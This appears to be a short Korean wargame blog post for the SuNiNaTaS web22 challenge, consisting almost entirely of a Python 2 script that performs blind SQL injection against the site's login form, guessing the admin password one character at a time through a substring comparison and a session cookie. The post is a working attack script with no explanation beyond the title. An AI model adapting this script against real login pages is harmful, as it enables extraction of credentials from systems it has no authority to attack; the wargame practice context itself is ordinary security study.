Wargame/SuNiNaTaS
SuNiNaTaS web22번
공부하자~~
2017. 3. 7. 20:12
import urllib, urllib2, sys url = "http://suninatas.com/Part_one/web22/web22.asp?" #string = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*()_+|\?><" key = "" for i in range(1,11): for j in range(30,126): dat = {'id': "admin' and (substring(pw,"+str(i)+",1)='"+chr(j)+"')-- ", 'pw': '1'} dat = urllib.urlencode(dat) req = urllib2.Request(url, dat,headers={'Host':'suninatas.com', 'Cookie': 'ASPSESSIONIDQATDBBCA=HEFDDLLDNHPHJJECHJOCLANO'}) res = urllib2.urlopen(req).read() print "i:"+ str(i) + "j:"+str(j) if "color=blue>admin" in res: print "[*]Find string! : " + chr(j) key += chr(j) break sys.exit(1) print "[+]FIND! : " + key